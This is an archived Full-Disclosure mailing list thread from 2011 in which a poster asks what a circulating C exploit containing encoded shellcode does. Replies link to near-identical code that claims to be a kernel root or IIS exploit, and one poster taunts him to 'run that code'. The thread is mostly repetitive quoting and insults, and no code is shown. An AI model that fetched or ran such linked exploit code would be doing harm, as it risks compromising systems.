I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Do yourself a favor and run that code dumbass. On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote: I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
My apolgies. I have a grammar problem,Its in part me not changing my old kb,and then also, im in an office sometimes and have to be quick : You do have a good point tho, I will try better. xd On 26 October 2011 13:29, Julian DeMarchi jul...@jdcomputers.com.au wrote: On 10/26/2011 12:24 PM, xD 0x41 wrote: Ok... i see now, it is being disguised, from along time ago... strange why it is being used, unless people have started to rename things maybe... to suit old things, wich dont work :s it is possible... I will see what it is doing and done sofar in the darknet i have setup in a sec and, that will be it. ok.. cheers. You're very knowledgeable thus I like reading what you have to post. Can I please ask you to concentrate on your grammar and the layout of your emails? They are hard to follow and I feel I am missing important parts in your emails due to this... --julian ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Using your smartphone while flipping burger can be dangerous pandawan. More over if you work at burger king. On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote: h the idiot who thinks im laurelai... meh , your a fool yourself just for even thinking that much :s your but an echo on the list, wich, does not echo the rest of it, wich is a good place to be. unfortunately, your one of the few who should just be blocked, for making absolutely nothing but abusive crap... your an idiot. not me. i dont run things, why, have you ran it ? Is it good ? hehe... maybe it is! i guess if hes using it...well... *sic* On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote: Do yourself a favor and run that code dumbass. On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote: I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
yer ofc... anyhow, ignoring you now... you obv think your some leet troll, your not, your ONLY a TROLL :) have a nice day or is that *Goplamamamama Ignananayu* forget the jedi oky, you gotta brushup on ya troll trash talk! bah hahaha. fool xd On 26 October 2011 13:44, Antony widmal antony.wid...@gmail.com wrote: Using your smartphone while flipping burger can be dangerous pandawan. More over if you work at burger king. On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 sec...@gmail.com wrote: h the idiot who thinks im laurelai... meh , your a fool yourself just for even thinking that much :s your but an echo on the list, wich, does not echo the rest of it, wich is a good place to be. unfortunately, your one of the few who should just be blocked, for making absolutely nothing but abusive crap... your an idiot. not me. i dont run things, why, have you ran it ? Is it good ? hehe... maybe it is! i guess if hes using it...well... *sic* On 26 October 2011 13:21, Antony widmal antony.wid...@gmail.com wrote: Do yourself a favor and run that code dumbass. On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 sec...@gmail.com wrote: I use darknets to help me, they send me the info i need. simple answer to simple question. look them up, they may oneday protect you, also. On 26 October 2011 13:15, adam a...@papsy.net wrote: http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, claims to be a remote kernel root exploit) http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very similar code, claims to be an IIS exploit) http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire thread, code is mentioned though) I'm sure there's more, but this kinda reminds me of that leaked private exploit on pastebin a few weeks back (you know, the one that was nice enough to create a _local_ root account), and insisted that it was private private private and specifically said NOT to leak it. I am curious as to how you're so certain that it's on many many boxes yet know next to nothing about it. On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 sec...@gmail.com wrote: Hello List, Id like people to also, like this thread asks, to pls give some opinion, other than mine.. wich, i am yet to make; http://www.hackerthreads.org/Topic-5973 Please look at this .c code on here, if you wish, and tell me, why A. It is still in circulation, seeminlgly, on MANY MANY boxes B. people still seem to try keep it private :s This morning, a friend from webhostingtalk.com ,asked me to take a look. I have and, i can only sofar say, once i decrypt the shellcode, ill know abit more.. altho , i rmember this thing, and, somany people were after it, people were paying for it, this is first time i have seen it actually disclosed tho, admittedly only looked today. If skiddies are using it to ddos things, I want to makesure i can expose it, and kill the threats. thankyou. xd .// exposing bullshit as i ride! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/